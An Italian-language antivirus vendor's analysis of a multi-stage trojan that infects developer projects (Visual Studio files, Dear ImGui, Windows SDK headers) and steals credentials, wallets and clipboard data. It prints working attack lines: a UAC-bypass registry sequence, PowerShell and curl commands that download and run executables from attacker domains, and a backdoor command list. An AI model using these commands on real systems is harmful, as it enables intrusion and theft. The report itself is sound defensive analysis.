L'obiettivo sono gli sviluppatori. Un nuovo trojan attacca le catene di fornitura e causa danni combinati ai PC infetti
Notizie "calde" | Tutte le notizie | Sui virus
I primi casi di diffusione del trojan sono stati registrati nell'ultimo trimestre del 2025, da allora in poi esso viene costantemente modificato dai relativi sviluppatori. Viene distribuito principalmente su internet tramite file infetti .exe e python. Il processo di infezione è a più fasi, di seguito analizziamo lo svolgimento di ciascuna fase e i rispettivi obiettivi.
Fase 1. Trojan.DownLoader49.35384
Gli specialisti Doctor Web hanno rilevato numerose applicazioni legittime infette con una struttura simile. Un oggetto globale è aggiunto al file eseguibile originale, e l'esecuzione dell'applicazione trojanizzata inizia con l'ottenimento dell'accesso alle API di sistema tramite il metodo PEB walking. Quindi la funzione standard initterm scorre la tabella dei puntatori a funzione e li inizializza, dove una di tali funzioni è malevola e lancia il comando PowerShell. In alcune versioni del trojan questo payload è conservato in forma crittografata.
Avvio tramite initterm
Il comando PowerShell scarica ed esegue il file malevolo Trojan.DownLoader49.35687, il che significa che viene lanciata la seconda fase.
Comando PowerShell malevolo
In aggiunta ai file eseguibili, sono stati rilevati file in linguaggio Python (Python.Downloader.255). In questi ultimi il codice malevolo era cifrato tramite il meccanismo di crittografia simmetrica Fernet. È celato tramite un semplice offuscamento — una sequenza di spazi nella prima riga. Anche in questo caso l'esecuzione avviene a più fasi.
File Python malevoli
Fase 2. Trojan.DownLoader49.35687
In questa fase il trojan Trojan.DownLoader49.35687 esegue il controllo della propria esecuzione in sandbox. Oltre a ciò, crea un oggetto di sincronizzazione mutex con il nome Global\PFNMX(valore fisso). Esempio di un simile oggetto: \Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008. In questo modo il trojan controlla se sul computer è già in esecuzione un'altra copia.
Durante la seconda fase, il trojan cerca di ottenere gli indirizzi del server C2 utilizzando i repository pubblici GitHub e della piattaforma di gioco Steam. Su di essi i malintenzionati lasciano domini che il trojan legge e utilizza come gli URL per scaricare la terza fase — il trojan BackDoor.Siggen2.5906.
Gli account Steam creati dai malintenzionati contengono un nome di dominio in chiaro.
Account Steam con un dominio C2
Su GitHub i malintenzionati hanno salvato un indirizzo cifrato di un dominio C2 sotto forma di un file raw: raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine. Il trojan scarica questo file e lo decodifica prima tramite Base64, e quindi tramite l'operazione XOR con la chiave ZwFlushKey.
Domini crittografati
Dopo aver scaricato la fase successiva, Trojan.DownLoader49.35687 la incorpora nel processo di uno dei 41 file eseguibili previamente specificati da C:\Windows\System32.
Il trojan aggiunge l'indirizzo del dominio C2 a cui ha potuto stabilire una connessione alle stringhe trascritte nel suo codice sorgente e lo passa alla fase successiva tramite il named pipe pipe\VccFramework.
Fase 3. BackDoor.Siggen2.5906
La principale attività malevola si verifica in questa fase. BackDoor.Siggen2.5906 crea un oggetto di sincronizzazione mutex con un nome fisso di tipo Global\PFNX_Side(valore fisso). Quindi, attraverso il canale precedentemente creato, il trojan ottiene i dati dalla seconda fase, dai quali estrae gli identificatori del trojan e il dominio C2 con cui BackDoor.Siggen2.5906 comunicherà.
Per guadagnare persistenza nel sistema, il trojan scarica il file "bungee.boo", che svolge le funzioni di fase 2, ovvero Trojan.DownLoader49.35687, e sostituisce con quest'ultimo i file DLL:
- "profapi.dll" dell'applicazione Discord,
- "domain_actions.dll" nella cartella "Domain Actions" e "well_known_domains.dll" nella cartella "Well Known Domains" dell'applicazione Microsoft Edge,
- "C:\Windows\omadmapi.dll".
Inoltre, BackDoor.Siggen2.5906 può alterare il registro di sistema di Windows in modo tale che all'apertura dei file compressi tramite WinRar.exe venga eseguito il codice malevolo.
Per le azioni con i permessi amministratore, il trojan utilizza una tecnica di aggiramento dell'UAC. Il malware genera un file .vbs con un nome composto da cifre casuali, in cui lascia il comando per l'esecuzione con i permessi amministratore. Quindi tramite cmd.exe vengono avviati i comandi:
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
In seguito, il trojan svolge 5 funzioni malevole: quelle di stealer, clipper, backdoor, cryptominer e fonte di infezione di file.
Stealer
Il Trojan è in grado di rubare varie informazioni:
- i tocken Discord, che consentono di accedere agli account altrui senza inserire il login/la password;
- le password e i cookie dai browser Chrome, Edge, Opera, Brave, Yandex ecc. Oltre alle solite tecniche di estrazione dei dati, esso può utilizzare il file CCCWF.tmp (Trojan.PWS.Siggen5.33623). Si incorpora nel browser, e quindi legge le password e le salva in file di testo;
- le cartelle di Telegram Desktop;
- le cartelle del portafoglio crittografico Exodus.
Oltre a rubare le cartelle Exodus, il trojan esegue la modificazione del portafoglio crittografico. Per fare questo, esso trova il file app.asar e lo sostituisce con una copia scaricata dall'URL balista[.]lol/Stb/PokerFace/RTApp[.]txt tramite curl. Nella versione furtivamente sostituita in index.js (Trojan.Siggen32.44702) si trova la funzione unlock(), la quale all'esecuzione invia le frasi mnemoniche del portafoglio crypto al server dei malintenzionati.
File index.js furtivamente sostituito
Clipper
È una funzione particolarmente pericolosa del trojan. Il malware monitora costantemente gli appunti dell'utente: cerca i dati di carte bancarie e li invia al server dei malintenzionati. Inoltre, il programma malevolo sostituisce gli indirizzi di portafogli crypto con quelli fraudolenti, i quali ottiene dal server C2.
Backdoor
Le funzionalità del trojan consentono ai malintenzionati di gestire il PC infetto in remoto mediante i comandi:
| exc | scarica un file da un url tramite curl ed eseguilo |
| RVRS | avvia un Reverse Proxy |
| RUNCMD | avvia un comando tramite cmd |
| GETFILE | carica il contenuto di un determinato file sul server di comando e controllo |
| LISTDIR | invia la lista dei file da una determinata directory del computer al server di comando e controllo |
| TROLL | esegui il comando per il trolling dell'utente, esistono le opzioni earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer ecc. |
Cryptominer
Tramite curl, il trojan scarica dal server e avvia il file https://files[.]catbox[.]moe/lvh9j3[.]bin — Trojan.Packed2.50953. La sua struttura e le sue azioni sono simili a quelle della fase 2, ma, invece di BackDoor.Siggen2.5906, esso scarica e incorpora Trojan.BtcMine.3956. Questo cryptominer si avvia solo dopo un determinato periodo di inattività dell'utente. Il malware utilizza gli strumenti XMRig, T-Rex e TeamRedMiner a codice sorgente aperto.
Infezione di file
Il principale tratto distintivo di questo trojan sono l'infezione di file e l'ulteriore propagazione autonoma. La lista dei file che vengono infettati:
- imgui_impl_win32.cpp,
- .suo,
- .exe,
- winnetwk.h (Windows SDK),
- .vcxproj e .csproj.
Per determinare i percorsi dei file che possono essere infettati, il trojan scansiona sequenzialmente i dischi e avvia il comando. Esempio per il disco A://
dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290.I malintenzionati contano su quello che gli sviluppatori pubblicheranno i loro progetti con codice malevolo in accesso aperto. Altri sviluppatori, che assembleranno, compileranno o modificheranno il progetto, infetteranno automaticamente i propri computer a causa dei file .suo, .vcxproj e .csproj, mentre gli utenti comuni potranno avviare i file eseguibili infetti, creati tramite gli strumenti di sviluppo compromessi.
File imgui_impl_win32.cpp. Trojan.Loader.3129
Il file imgui_impl_win32.cpp è parte della popolare libreria Dear ImGui, responsabile dell'interfaccia grafica del linguaggio di programmazione C++. Il trojan incorpora nel file due stringhe: la prima contiene il payload, la seconda lo lancia.
Stringa di codice con il payload
Stringa di codice con l'avvio del payload
Il risultato è il comando
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }"
Pertanto, la libreria viene infettata, e qualsiasi applicazione in C++ creata dall'utente conterrà in sé codice malevolo. Con il trasferimento o caricamento delle simili applicazioni, l'infezione si diffonderà ulteriormente.
File .suo. Trojan.Loader.3138
È un'estensione dei file dell'ambiente di sviluppo Microsoft Visual Studio. In questi file sono conservate le impostazioni dell'utente per determinati progetti. Il trojan sostituisce il file originale con quello infetto, ottenuto dal C2.
File infetto
Come risultato, all'apertura del progetto in Visual Studio viene avviato il codice malevolo:
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
File winnetwk.h. Trojan.Loader.3184
Windows SDK è un set di strumenti ufficiale di Microsoft che consente di creare applicazioni per SO Windows.
Tramite il registro, il trojan trova la cartella in cui è installato Windows SDK. In questa cartella avviene la ricerca del file winnetwk.h, responsabile dell'interazione con le risorse di rete. Quindi ad esso viene aggiunto il codice malevolo.
File winnetwk.h infetto
A seguito di questo, tutti i programmi creati con l'utilizzo di winnetwk.h avranno il codice malevolo, il quale avvia la fase 2.
File .exe
Il trojan cerca i file .exe adatti e incorpora in essi le funzioni di inizializzazione delle API e di avvio di initterm. Quindi il file inizia a funzionare come Trojan.DownLoader49.35384, ovvero la fase 1.
File .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) e .csproj (Trojan.Loader.3126)
Sono file dei progetti Visual Studio nei linguaggi di programmazione C++ e C#. Ad essi viene aggiunto il comando PreBuildEvent, che viene eseguito prima di ciascun assemblaggio di un progetto. Le prime versioni del trojan aggiungevano un codice simile alla fase 1.
Una prima versione di codice
Nelle nuove versioni il codice è diventato più complesso, è comparso un ulteriore offuscamento.
Una nuova versione di codice
Una delle fasi di esecuzione di Trojan.Loader.3128
Come risultato dell'esecuzione del comando malevolo, viene scritto un file .vbs malevolo, il quale, a sua volta, avvia PowerShell payload. Il trojan effettua una richiesta agli indirizzi URL:
- youtu.be/akoxddx6lgc,
- steamcommunity.com/profiles/76561198737324192.
Su questi indirizzi è conservato un altro indirizzo URL crittografato tramite base64.
Account YouTube con un indirizzo URL crittografato
Dopo la decodifica, il trojan ottiene un dominio C2 a cui esso si connette per ricevere il payload, che è simile alla fase 2.
La descrizione del funzionamento del trojan ci permette di concludere che esso rappresenta un pericolo elevato a causa della combinazione di diverse funzioni malevole. Per evitare l'infezione del proprio computer e l'ulteriore diffusione del trojan, vi consigliamo di aggiornare regolarmente i database antivirus e controllare tutti i file scaricati da internet. Gli utenti dell'antivirus Dr.Web Security Space e Dr.Web Desktop Security Suite possono essere tranquilli, in quanto il trojan viene rilevato ed eliminato in modo affidabile dagli antivirus Dr.Web. I file di tipo .vcxproj, .csproj e imgui vengono curati, da essi viene eliminato il codice malevolo.